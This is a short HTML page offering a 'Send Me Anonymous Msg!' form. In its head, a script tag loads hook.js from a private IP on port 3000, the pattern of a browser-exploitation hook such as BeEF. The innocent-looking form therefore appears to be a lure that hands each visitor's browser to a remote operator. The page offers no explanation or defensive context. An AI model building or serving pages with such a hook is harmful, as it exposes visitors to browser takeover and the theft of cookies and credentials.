<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Send Me Anonymous Msg!</title>
    <link rel="stylesheet" href="./style.css">
    <script src="http://192.168.52.128:3000/hook.js"></script>
</head>
<body>
    <form action="./sent.html" class="form">
        <label for="Anonymous_Msg">Send Me Anonymous Msg!</label><br>
        <input type="text" name="Anonymous_Msg" placeholder="Type Your Msg Anonymously!"><br>
        <input type="submit" value="Send">
    </form>
</body>
</html>